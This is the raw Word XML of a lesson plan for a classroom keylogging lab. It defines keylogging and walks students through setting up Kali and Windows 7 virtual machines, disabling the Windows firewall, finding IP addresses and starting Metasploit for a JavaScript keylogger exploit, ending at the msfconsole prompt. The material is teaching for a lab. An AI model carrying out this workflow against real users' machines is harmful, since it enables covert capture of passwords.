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Activity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Length of Time (0:00)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Student or Team</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Keylogging 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:55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Student</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="1134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9450"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1890"/>
            <w:gridCol w:w="945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Keylogging is the use of a program to record every keystroke made by a computer user in order to gain fraudulent access to passwords and other confidential information. Students will understand the concepts of password safety and keylogging attacks. Keystroke logging, often referred to as keylogging or keyboard capturing, is recording the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program.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Learning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Understand how computing resources can be protected and can be misused. </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Explain how unauthorized access to computing resources is gained.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TA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TA can demo for students and then have each login into cyber range and follow the instructions. After the activity, discuss ways to mitigate this attack.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11">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Preparation</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux Virtual Machine</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 7 Virtual Machine</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Software Tools used (both from Kali Linux OS)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Metasploit Framework</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Web JavaScript Keylogger Exploit</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Setup Environments</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Log into the Cyber Range</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Open the Kali Linux and Windows 7 Environments</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In Windows, change your network location</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Click on the Windows Start button</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Search for “Network”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Open the Network and Sharing Center program</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Under your Network #, click on the “Public Network”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Select the “Home Network” option (This disables the Windows Firewall)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Find the IP Address (Kali Machine)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">You will need the IP address of the Kali machine</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Open the Terminal</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">In Kali, open the Terminal and type the following command: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hostname -I</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">This will display the IP Address</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Write down the Kali VM IP address</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Find the IP Address (Windows Machine)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Select the Start button (Windows Machine) and search for “cmd”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Open cmd (Command Prompt)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Use the following command: ipconfig</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Search for the IPv4 Address line</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Write down the Windows IP Address</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Initialize Metasploit</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">In the Kali environment, open Terminal</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Type </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo systemctl start postgresql </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">to start the database:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Type </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo msfdb init</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to start the Metasploit framework:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">•</w:t>
              <w:tab/>
              <w:t xml:space="preserve">Start Metasploit with </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="38761d"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">You should notice that Metasploit console has started, and you should now see the following prompt: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
            <w:pPr>
